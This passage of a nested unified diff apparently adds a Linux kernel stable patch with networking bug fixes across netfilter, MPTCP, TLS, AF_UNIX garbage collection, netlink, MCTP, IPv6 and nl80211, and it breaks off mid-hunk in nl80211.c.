+@@ -279,6 +279,7 @@ void nf_send_reset(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 		goto free_nskb;
+ 
+ 	nf_ct_attach(nskb, oldskb);
++	nf_ct_set_closing(skb_nfct(oldskb));
+ 
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+ 	/* If we use ip_local_out for bridged traffic, the MAC source on
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 46527b5cc8f0c..1648373692a99 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -5473,9 +5473,10 @@ static int inet6_rtm_getaddr(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 	}
+ 
+ 	addr = extract_addr(tb[IFA_ADDRESS], tb[IFA_LOCAL], &peer);
+-	if (!addr)
+-		return -EINVAL;
+-
++	if (!addr) {
++		err = -EINVAL;
++		goto errout;
++	}
+ 	ifm = nlmsg_data(nlh);
+ 	if (ifm->ifa_index)
+ 		dev = dev_get_by_index(tgt_net, ifm->ifa_index);
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index 0b42eb8c55aaf..62247621cea52 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -1077,6 +1077,7 @@ static const struct ipv6_bpf_stub ipv6_bpf_stub_impl = {
+ 	.udp6_lib_lookup = __udp6_lib_lookup,
+ 	.ipv6_setsockopt = do_ipv6_setsockopt,
+ 	.ipv6_getsockopt = do_ipv6_getsockopt,
++	.ipv6_dev_get_saddr = ipv6_dev_get_saddr,
+ };
+ 
+ static int __init inet6_init(void)
+diff --git a/net/ipv6/netfilter/nf_reject_ipv6.c b/net/ipv6/netfilter/nf_reject_ipv6.c
+index 433d98bbe33f7..71d692728230e 100644
+--- a/net/ipv6/netfilter/nf_reject_ipv6.c
++++ b/net/ipv6/netfilter/nf_reject_ipv6.c
+@@ -344,6 +344,7 @@ void nf_send_reset6(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 	nf_reject_ip6_tcphdr_put(nskb, oldskb, otcph, otcplen);
+ 
+ 	nf_ct_attach(nskb, oldskb);
++	nf_ct_set_closing(skb_nfct(oldskb));
+ 
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+ 	/* If we use ip6_local_out for bridged traffic, the MAC source on
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index 256bf0b89e6ca..0144d8ebdaefb 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -888,7 +888,7 @@ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		dev = dev_get_by_index_rcu(sock_net(sk), cb->ifindex);
+ 		if (!dev) {
+ 			rcu_read_unlock();
+-			return rc;
++			goto out_free;
+ 		}
+ 		rt->dev = __mctp_dev_get(dev);
+ 		rcu_read_unlock();
+@@ -903,7 +903,8 @@ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		rt->mtu = 0;
+ 
+ 	} else {
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto out_free;
+ 	}
+ 
+ 	spin_lock_irqsave(&rt->dev->addrs_lock, flags);
+@@ -966,12 +967,17 @@ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		rc = mctp_do_fragment_route(rt, skb, mtu, tag);
+ 	}
+ 
++	/* route output functions consume the skb, even on error */
++	skb = NULL;
++
+ out_release:
+ 	if (!ext_rt)
+ 		mctp_route_release(rt);
+ 
+ 	mctp_dev_put(tmp_rt.dev);
+ 
++out_free:
++	kfree_skb(skb);
+ 	return rc;
+ }
+ 
+diff --git a/net/mptcp/diag.c b/net/mptcp/diag.c
+index e57c5f47f0351..7017dd60659dc 100644
+--- a/net/mptcp/diag.c
++++ b/net/mptcp/diag.c
+@@ -21,6 +21,9 @@ static int subflow_get_info(struct sock *sk, struct sk_buff *skb)
+ 	bool slow;
+ 	int err;
+ 
++	if (inet_sk_state_load(sk) == TCP_LISTEN)
++		return 0;
++
+ 	start = nla_nest_start_noflag(skb, INET_ULP_INFO_MPTCP);
+ 	if (!start)
+ 		return -EMSGSIZE;
+@@ -65,7 +68,7 @@ static int subflow_get_info(struct sock *sk, struct sk_buff *skb)
+ 			sf->map_data_len) ||
+ 	    nla_put_u32(skb, MPTCP_SUBFLOW_ATTR_FLAGS, flags) ||
+ 	    nla_put_u8(skb, MPTCP_SUBFLOW_ATTR_ID_REM, sf->remote_id) ||
+-	    nla_put_u8(skb, MPTCP_SUBFLOW_ATTR_ID_LOC, sf->local_id)) {
++	    nla_put_u8(skb, MPTCP_SUBFLOW_ATTR_ID_LOC, subflow_get_local_id(sf))) {
+ 		err = -EMSGSIZE;
+ 		goto nla_failure;
+ 	}
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 70a1025f093cf..3328870b0c1f8 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -407,23 +407,12 @@ void mptcp_pm_free_anno_list(struct mptcp_sock *msk)
+ 	}
+ }
+ 
+-static bool lookup_address_in_vec(const struct mptcp_addr_info *addrs, unsigned int nr,
+-				  const struct mptcp_addr_info *addr)
+-{
+-	int i;
+-
+-	for (i = 0; i < nr; i++) {
+-		if (addrs[i].id == addr->id)
+-			return true;
+-	}
+-
+-	return false;
+-}
+-
+ /* Fill all the remote addresses into the array addrs[],
+  * and return the array size.
+  */
+-static unsigned int fill_remote_addresses_vec(struct mptcp_sock *msk, bool fullmesh,
++static unsigned int fill_remote_addresses_vec(struct mptcp_sock *msk,
++					      struct mptcp_addr_info *local,
++					      bool fullmesh,
+ 					      struct mptcp_addr_info *addrs)
+ {
+ 	bool deny_id0 = READ_ONCE(msk->pm.remote_deny_join_id0);
+@@ -446,15 +435,28 @@ static unsigned int fill_remote_addresses_vec(struct mptcp_sock *msk, bool fullm
+ 		msk->pm.subflows++;
+ 		addrs[i++] = remote;
+ 	} else {
++		DECLARE_BITMAP(unavail_id, MPTCP_PM_MAX_ADDR_ID + 1);
++
++		/* Forbid creation of new subflows matching existing
++		 * ones, possibly already created by incoming ADD_ADDR
++		 */
++		bitmap_zero(unavail_id, MPTCP_PM_MAX_ADDR_ID + 1);
++		mptcp_for_each_subflow(msk, subflow)
++			if (READ_ONCE(subflow->local_id) == local->id)
++				__set_bit(subflow->remote_id, unavail_id);
++
+ 		mptcp_for_each_subflow(msk, subflow) {
+ 			ssk = mptcp_subflow_tcp_sock(subflow);
+ 			remote_address((struct sock_common *)ssk, &addrs[i]);
+-			addrs[i].id = subflow->remote_id;
++			addrs[i].id = READ_ONCE(subflow->remote_id);
+ 			if (deny_id0 && !addrs[i].id)
+ 				continue;
+ 
+-			if (!lookup_address_in_vec(addrs, i, &addrs[i]) &&
+-			    msk->pm.subflows < subflows_max) {
++			if (msk->pm.subflows < subflows_max) {
++				/* forbid creating multiple address towards
++				 * this id
++				 */
++				__set_bit(addrs[i].id, unavail_id);
+ 				msk->pm.subflows++;
+ 				i++;
+ 			}
+@@ -603,7 +605,7 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		fullmesh = !!(local->flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
+ 
+ 		msk->pm.local_addr_used++;
+-		nr = fill_remote_addresses_vec(msk, fullmesh, addrs);
++		nr = fill_remote_addresses_vec(msk, &local->addr, fullmesh, addrs);
+ 		if (nr)
+ 			__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
+ 		spin_unlock_bh(&msk->pm.lock);
+@@ -798,18 +800,18 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 
+ 		mptcp_for_each_subflow_safe(msk, subflow, tmp) {
+ 			struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++			u8 remote_id = READ_ONCE(subflow->remote_id);
+ 			int how = RCV_SHUTDOWN | SEND_SHUTDOWN;
+-			u8 id = subflow->local_id;
++			u8 id = subflow_get_local_id(subflow);
+ 
+-			if (rm_type == MPTCP_MIB_RMADDR && subflow->remote_id != rm_id)
++			if (rm_type == MPTCP_MIB_RMADDR && remote_id != rm_id)
+ 				continue;
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW && !mptcp_local_id_match(msk, id, rm_id))
+ 				continue;
+ 
+ 			pr_debug(" -> %s rm_list_ids[%d]=%u local_id=%u remote_id=%u mpc_id=%u",
+ 				 rm_type == MPTCP_MIB_RMADDR ? "address" : "subflow",
+-				 i, rm_id, subflow->local_id, subflow->remote_id,
+-				 msk->mpc_endpoint_id);
++				 i, rm_id, id, remote_id, msk->mpc_endpoint_id);
+ 			spin_unlock_bh(&msk->pm.lock);
+ 			mptcp_subflow_shutdown(sk, ssk, how);
+ 
+@@ -2028,7 +2030,7 @@ static int mptcp_event_add_subflow(struct sk_buff *skb, const struct sock *ssk)
+ 	if (WARN_ON_ONCE(!sf))
+ 		return -EINVAL;
+ 
+-	if (nla_put_u8(skb, MPTCP_ATTR_LOC_ID, sf->local_id))
++	if (nla_put_u8(skb, MPTCP_ATTR_LOC_ID, subflow_get_local_id(sf)))
+ 		return -EMSGSIZE;
+ 
+ 	if (nla_put_u8(skb, MPTCP_ATTR_REM_ID, sf->remote_id))
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 631fa104617c3..414ed70e7ba2e 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -233,7 +233,7 @@ static int mptcp_userspace_pm_remove_id_zero_address(struct mptcp_sock *msk,
+ 
+ 	lock_sock(sk);
+ 	mptcp_for_each_subflow(msk, subflow) {
+-		if (subflow->local_id == 0) {
++		if (READ_ONCE(subflow->local_id) == 0) {
+ 			has_id_0 = true;
+ 			break;
+ 		}
+@@ -489,6 +489,16 @@ int mptcp_nl_cmd_sf_destroy(struct sk_buff *skb, struct genl_info *info)
+ 		goto destroy_err;
+ 	}
+ 
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	if (addr_l.family == AF_INET && ipv6_addr_v4mapped(&addr_r.addr6)) {
++		ipv6_addr_set_v4mapped(addr_l.addr.s_addr, &addr_l.addr6);
++		addr_l.family = AF_INET6;
++	}
++	if (addr_r.family == AF_INET && ipv6_addr_v4mapped(&addr_l.addr6)) {
++		ipv6_addr_set_v4mapped(addr_r.addr.s_addr, &addr_r.addr6);
++		addr_r.family = AF_INET6;
++	}
++#endif
+ 	if (addr_l.family != addr_r.family) {
+ 		GENL_SET_ERR_MSG(info, "address families do not match");
+ 		err = -EINVAL;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 859b18cb8e4f6..3bc21581486ae 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -119,7 +119,7 @@ static int __mptcp_socket_create(struct mptcp_sock *msk)
+ 	subflow->request_mptcp = 1;
+ 
+ 	/* This is the first subflow, always with id 0 */
+-	subflow->local_id_valid = 1;
++	WRITE_ONCE(subflow->local_id, 0);
+ 	mptcp_sock_graft(msk->first, sk->sk_socket);
+ 
+ 	return 0;
+@@ -1319,6 +1319,7 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 		mpext = skb_ext_find(skb, SKB_EXT_MPTCP);
+ 		if (!mptcp_skb_can_collapse_to(data_seq, skb, mpext)) {
+ 			TCP_SKB_CB(skb)->eor = 1;
++			tcp_mark_push(tcp_sk(ssk), skb);
+ 			goto alloc_skb;
+ 		}
+ 
+@@ -2440,6 +2441,8 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+ 		__mptcp_subflow_disconnect(ssk, subflow, flags);
++		if (msk->subflow && ssk == msk->subflow->sk)
++			msk->subflow->state = SS_UNCONNECTED;
+ 		release_sock(ssk);
+ 
+ 		goto out;
+@@ -3166,8 +3169,50 @@ static struct ipv6_pinfo *mptcp_inet6_sk(const struct sock *sk)
+ 
+ 	return (struct ipv6_pinfo *)(((u8 *)sk) + offset);
+ }
++
++static void mptcp_copy_ip6_options(struct sock *newsk, const struct sock *sk)
++{
++	const struct ipv6_pinfo *np = inet6_sk(sk);
++	struct ipv6_txoptions *opt;
++	struct ipv6_pinfo *newnp;
++
++	newnp = inet6_sk(newsk);
++
++	rcu_read_lock();
++	opt = rcu_dereference(np->opt);
++	if (opt) {
++		opt = ipv6_dup_options(newsk, opt);
++		if (!opt)
++			net_warn_ratelimited("%s: Failed to copy ip6 options\n", __func__);
++	}
++	RCU_INIT_POINTER(newnp->opt, opt);
++	rcu_read_unlock();
++}
+ #endif
+ 
++static void mptcp_copy_ip_options(struct sock *newsk, const struct sock *sk)
++{
++	struct ip_options_rcu *inet_opt, *newopt = NULL;
++	const struct inet_sock *inet = inet_sk(sk);
++	struct inet_sock *newinet;
++
++	newinet = inet_sk(newsk);
++
++	rcu_read_lock();
++	inet_opt = rcu_dereference(inet->inet_opt);
++	if (inet_opt) {
++		newopt = sock_kmalloc(newsk, sizeof(*inet_opt) +
++				      inet_opt->opt.optlen, GFP_ATOMIC);
++		if (newopt)
++			memcpy(newopt, inet_opt, sizeof(*inet_opt) +
++			       inet_opt->opt.optlen);
++		else
++			net_warn_ratelimited("%s: Failed to copy ip options\n", __func__);
++	}
++	RCU_INIT_POINTER(newinet->inet_opt, newopt);
++	rcu_read_unlock();
++}
++
+ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 				 const struct mptcp_options_received *mp_opt,
+ 				 struct sock *ssk,
+@@ -3188,6 +3233,13 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 
+ 	__mptcp_init_sock(nsk);
+ 
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	if (nsk->sk_family == AF_INET6)
++		mptcp_copy_ip6_options(nsk, sk);
++	else
++#endif
++		mptcp_copy_ip_options(nsk, sk);
++
+ 	msk = mptcp_sk(nsk);
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+@@ -3200,7 +3252,7 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 	msk->write_seq = subflow_req->idsn + 1;
+ 	msk->snd_nxt = msk->write_seq;
+ 	msk->snd_una = msk->write_seq;
+-	msk->wnd_end = msk->snd_nxt + req->rsk_rcv_wnd;
++	msk->wnd_end = msk->snd_nxt + tcp_sk(ssk)->snd_wnd;
+ 	msk->setsockopt_seq = mptcp_sk(sk)->setsockopt_seq;
+ 
+ 	if (mp_opt->suboptions & OPTIONS_MPTCP_MPC) {
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index b092205213234..2bc37773e7803 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -475,7 +475,6 @@ struct mptcp_subflow_context {
+ 		can_ack : 1,        /* only after processing the remote a key */
+ 		disposable : 1,	    /* ctx can be free at ulp release time */
+ 		stale : 1,	    /* unable to snd/rcv data, do not use for xmit */
+-		local_id_valid : 1, /* local_id is correctly initialized */
+ 		valid_csum_seen : 1;        /* at least one csum validated */
+ 	enum mptcp_data_avail data_avail;
+ 	u32	remote_nonce;
+@@ -483,7 +482,7 @@ struct mptcp_subflow_context {
+ 	u32	local_nonce;
+ 	u32	remote_token;
+ 	u8	hmac[MPTCPOPT_HMAC_LEN];
+-	u8	local_id;
++	s16	local_id;	    /* if negative not initialized yet */
+ 	u8	remote_id;
+ 	u8	reset_seen:1;
+ 	u8	reset_transient:1;
+@@ -529,6 +528,7 @@ mptcp_subflow_ctx_reset(struct mptcp_subflow_context *subflow)
+ {
+ 	memset(&subflow->reset, 0, sizeof(subflow->reset));
+ 	subflow->request_mptcp = 1;
++	WRITE_ONCE(subflow->local_id, -1);
+ }
+ 
+ static inline u64
+@@ -909,6 +909,15 @@ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ 
++static inline u8 subflow_get_local_id(const struct mptcp_subflow_context *subflow)
++{
++	int local_id = READ_ONCE(subflow->local_id);
++
++	if (local_id < 0)
++		return 0;
++	return local_id;
++}
++
+ void __init mptcp_pm_nl_init(void);
+ void mptcp_pm_nl_work(struct mptcp_sock *msk);
+ void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 45d20e20cfc00..891c2f4fed080 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -446,7 +446,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->backup = mp_opt.backup;
+ 		subflow->thmac = mp_opt.thmac;
+ 		subflow->remote_nonce = mp_opt.nonce;
+-		subflow->remote_id = mp_opt.join_id;
++		WRITE_ONCE(subflow->remote_id, mp_opt.join_id);
+ 		pr_debug("subflow=%p, thmac=%llu, remote_nonce=%u backup=%d",
+ 			 subflow, subflow->thmac, subflow->remote_nonce,
+ 			 subflow->backup);
+@@ -489,8 +489,8 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 
+ static void subflow_set_local_id(struct mptcp_subflow_context *subflow, int local_id)
+ {
+-	subflow->local_id = local_id;
+-	subflow->local_id_valid = 1;
++	WARN_ON_ONCE(local_id < 0 || local_id > 255);
++	WRITE_ONCE(subflow->local_id, local_id);
+ }
+ 
+ static int subflow_chk_local_id(struct sock *sk)
+@@ -499,7 +499,7 @@ static int subflow_chk_local_id(struct sock *sk)
+ 	struct mptcp_sock *msk = mptcp_sk(subflow->conn);
+ 	int err;
+ 
+-	if (likely(subflow->local_id_valid))
++	if (likely(subflow->local_id >= 0))
+ 		return 0;
+ 
+ 	err = mptcp_pm_get_local_id(msk, (struct sock_common *)sk);
+@@ -1477,7 +1477,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 	pr_debug("msk=%p remote_token=%u local_id=%d remote_id=%d", msk,
+ 		 remote_token, local_id, remote_id);
+ 	subflow->remote_token = remote_token;
+-	subflow->remote_id = remote_id;
++	WRITE_ONCE(subflow->remote_id, remote_id);
+ 	subflow->request_join = 1;
+ 	subflow->request_bkup = !!(flags & MPTCP_PM_ADDR_FLAG_BACKUP);
+ 	mptcp_info2sockaddr(remote, &addr, ssk->sk_family);
+@@ -1630,6 +1630,7 @@ static struct mptcp_subflow_context *subflow_create_ctx(struct sock *sk,
+ 	pr_debug("subflow=%p", ctx);
+ 
+ 	ctx->tcp_sock = sk;
++	WRITE_ONCE(ctx->local_id, -1);
+ 
+ 	return ctx;
+ }
+@@ -1867,13 +1868,13 @@ static void subflow_ulp_clone(const struct request_sock *req,
+ 		new_ctx->idsn = subflow_req->idsn;
+ 
+ 		/* this is the first subflow, id is always 0 */
+-		new_ctx->local_id_valid = 1;
++		subflow_set_local_id(new_ctx, 0);
+ 	} else if (subflow_req->mp_join) {
+ 		new_ctx->ssn_offset = subflow_req->ssn_offset;
+ 		new_ctx->mp_join = 1;
+ 		new_ctx->fully_established = 1;
+ 		new_ctx->backup = subflow_req->backup;
+-		new_ctx->remote_id = subflow_req->remote_id;
++		WRITE_ONCE(new_ctx->remote_id, subflow_req->remote_id);
+ 		new_ctx->token = subflow_req->token;
+ 		new_ctx->thmac = subflow_req->thmac;
+ 
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 55a7f72d547cd..edf92074221e2 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -707,6 +707,22 @@ void nf_conntrack_destroy(struct nf_conntrack *nfct)
+ }
+ EXPORT_SYMBOL(nf_conntrack_destroy);
+ 
++void nf_ct_set_closing(struct nf_conntrack *nfct)
++{
++	const struct nf_ct_hook *ct_hook;
++
++	if (!nfct)
++		return;
++
++	rcu_read_lock();
++	ct_hook = rcu_dereference(nf_ct_hook);
++	if (ct_hook)
++		ct_hook->set_closing(nfct);
++
++	rcu_read_unlock();
++}
++EXPORT_SYMBOL_GPL(nf_ct_set_closing);
++
+ bool nf_ct_get_tuple_skb(struct nf_conntrack_tuple *dst_tuple,
+ 			 const struct sk_buff *skb)
+ {
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 7960262966094..024f93fc8c0bb 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -2772,11 +2772,24 @@ int nf_conntrack_init_start(void)
+ 	return ret;
+ }
+ 
++static void nf_conntrack_set_closing(struct nf_conntrack *nfct)
++{
++	struct nf_conn *ct = nf_ct_to_nf_conn(nfct);
++
++	switch (nf_ct_protonum(ct)) {
++	case IPPROTO_TCP:
++		nf_conntrack_tcp_set_closing(ct);
++		break;
++	}
++}
++
+ static const struct nf_ct_hook nf_conntrack_hook = {
+ 	.update		= nf_conntrack_update,
+ 	.destroy	= nf_ct_destroy,
+ 	.get_tuple_skb  = nf_conntrack_get_tuple_skb,
+ 	.attach		= nf_conntrack_attach,
++	.set_closing	= nf_conntrack_set_closing,
++	.confirm	= __nf_conntrack_confirm,
+ };
+ 
+ void nf_conntrack_init_end(void)
+diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
+index e0092bf273fd0..9480e638e5d15 100644
+--- a/net/netfilter/nf_conntrack_proto_tcp.c
++++ b/net/netfilter/nf_conntrack_proto_tcp.c
+@@ -913,6 +913,41 @@ static bool tcp_can_early_drop(const struct nf_conn *ct)
+ 	return false;
+ }
+ 
++void nf_conntrack_tcp_set_closing(struct nf_conn *ct)
++{
++	enum tcp_conntrack old_state;
++	const unsigned int *timeouts;
++	u32 timeout;
++
++	if (!nf_ct_is_confirmed(ct))
++		return;
++
++	spin_lock_bh(&ct->lock);
++	old_state = ct->proto.tcp.state;
++	ct->proto.tcp.state = TCP_CONNTRACK_CLOSE;
++
++	if (old_state == TCP_CONNTRACK_CLOSE ||
++	    test_bit(IPS_FIXED_TIMEOUT_BIT, &ct->status)) {
++		spin_unlock_bh(&ct->lock);
++		return;
++	}
++
++	timeouts = nf_ct_timeout_lookup(ct);
++	if (!timeouts) {
++		const struct nf_tcp_net *tn;
++
++		tn = nf_tcp_pernet(nf_ct_net(ct));
++		timeouts = tn->timeouts;
++	}
++
++	timeout = timeouts[TCP_CONNTRACK_CLOSE];
++	WRITE_ONCE(ct->timeout, timeout + nfct_time_stamp);
++
++	spin_unlock_bh(&ct->lock);
++
++	nf_conntrack_event_cache(IPCT_PROTOINFO, ct);
++}
++
+ static void nf_ct_tcp_state_reset(struct ip_ct_tcp_state *state)
+ {
+ 	state->td_end		= 0;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index e21ec3ad80939..d3ba947f43761 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4752,6 +4752,9 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
+ 
++		if (flags & NFT_SET_ANONYMOUS)
++			return -EOPNOTSUPP;
++
+ 		err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &desc.timeout);
+ 		if (err)
+ 			return err;
+@@ -4760,6 +4763,10 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (nla[NFTA_SET_GC_INTERVAL] != NULL) {
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
++
++		if (flags & NFT_SET_ANONYMOUS)
++			return -EOPNOTSUPP;
++
+ 		desc.gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
+ 	}
+ 
+diff --git a/net/netfilter/nft_compat.c b/net/netfilter/nft_compat.c
+index e1623fbf36548..e4b8c02c5e6ae 100644
+--- a/net/netfilter/nft_compat.c
++++ b/net/netfilter/nft_compat.c
+@@ -358,10 +358,20 @@ static int nft_target_validate(const struct nft_ctx *ctx,
+ 
+ 	if (ctx->family != NFPROTO_IPV4 &&
+ 	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET &&
+ 	    ctx->family != NFPROTO_BRIDGE &&
+ 	    ctx->family != NFPROTO_ARP)
+ 		return -EOPNOTSUPP;
+ 
++	ret = nft_chain_validate_hooks(ctx->chain,
++				       (1 << NF_INET_PRE_ROUTING) |
++				       (1 << NF_INET_LOCAL_IN) |
++				       (1 << NF_INET_FORWARD) |
++				       (1 << NF_INET_LOCAL_OUT) |
++				       (1 << NF_INET_POST_ROUTING));
++	if (ret)
++		return ret;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+@@ -607,10 +617,20 @@ static int nft_match_validate(const struct nft_ctx *ctx,
+ 
+ 	if (ctx->family != NFPROTO_IPV4 &&
+ 	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET &&
+ 	    ctx->family != NFPROTO_BRIDGE &&
+ 	    ctx->family != NFPROTO_ARP)
+ 		return -EOPNOTSUPP;
+ 
++	ret = nft_chain_validate_hooks(ctx->chain,
++				       (1 << NF_INET_PRE_ROUTING) |
++				       (1 << NF_INET_LOCAL_IN) |
++				       (1 << NF_INET_FORWARD) |
++				       (1 << NF_INET_LOCAL_OUT) |
++				       (1 << NF_INET_POST_ROUTING));
++	if (ret)
++		return ret;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 6857a4965fe87..e9b81cba1e2b4 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -167,7 +167,7 @@ static inline u32 netlink_group_mask(u32 group)
+ static struct sk_buff *netlink_to_full_skb(const struct sk_buff *skb,
+ 					   gfp_t gfp_mask)
+ {
+-	unsigned int len = skb_end_offset(skb);
++	unsigned int len = skb->len;
+ 	struct sk_buff *new;
+ 
+ 	new = alloc_skb(len, gfp_mask);
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 93e1bfa72d791..2bd27b77769cb 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -273,6 +273,8 @@ static int tls_do_decryption(struct sock *sk,
+ 			return 0;
+ 
+ 		ret = crypto_wait_req(ret, &ctx->async_wait);
++	} else if (darg->async) {
++		atomic_dec(&ctx->decrypt_pending);
+ 	}
+ 	darg->async = false;
+ 
+@@ -2021,6 +2023,7 @@ int tls_sw_recvmsg(struct sock *sk,
+ 	struct strp_msg *rxm;
+ 	struct tls_msg *tlm;
+ 	ssize_t copied = 0;
++	ssize_t peeked = 0;
+ 	bool async = false;
+ 	int target, err;
+ 	bool is_kvec = iov_iter_is_kvec(&msg->msg_iter);
+@@ -2168,8 +2171,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 			if (err < 0)
+ 				goto put_on_rx_list_err;
+ 
+-			if (is_peek)
++			if (is_peek) {
++				peeked += chunk;
+ 				goto put_on_rx_list;
++			}
+ 
+ 			if (partially_consumed) {
+ 				rxm->offset += chunk;
+@@ -2208,8 +2213,8 @@ int tls_sw_recvmsg(struct sock *sk,
+ 
+ 		/* Drain records from the rx_list & copy if required */
+ 		if (is_peek || is_kvec)
+-			err = process_rx_list(ctx, msg, &control, copied,
+-					      decrypted, is_peek, NULL);
++			err = process_rx_list(ctx, msg, &control, copied + peeked,
++					      decrypted - peeked, is_peek, NULL);
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek, NULL);
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index 767b338a7a2d4..ab2c83d58b62a 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -284,9 +284,17 @@ void unix_gc(void)
+ 	 * which are creating the cycle(s).
+ 	 */
+ 	skb_queue_head_init(&hitlist);
+-	list_for_each_entry(u, &gc_candidates, link)
++	list_for_each_entry(u, &gc_candidates, link) {
+ 		scan_children(&u->sk, inc_inflight, &hitlist);
+ 
++#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
++		if (u->oob_skb) {
++			kfree_skb(u->oob_skb);
++			u->oob_skb = NULL;
++		}
++#endif
++	}
++
+ 	/* not_cycle_list contains those sockets which do not make up a
+ 	 * cycle.  Restore these to the inflight list.
+ 	 */
+@@ -314,17 +322,6 @@ void unix_gc(void)
+ 	/* Here we are. Hitlist is filled. Die. */
+ 	__skb_queue_purge(&hitlist);
+ 
+-#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+-	list_for_each_entry_safe(u, next, &gc_candidates, link) {
+-		struct sk_buff *skb = u->oob_skb;
+-
+-		if (skb) {
+-			u->oob_skb = NULL;
+-			kfree_skb(skb);
+-		}
+-	}
+-#endif
+-
+ 	spin_lock(&unix_gc_lock);
+ 
+ 	/* There could be io_uring registered files, just push them back to
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index c259d3227a9e2..1a3bd554e2586 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -4137,6 +4137,8 @@ static int nl80211_set_interface(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		if (ntype != NL80211_IFTYPE_MESH_POINT)
+ 			return -EINVAL;
++		if (otype != NL80211_IFTYPE_MESH_POINT)
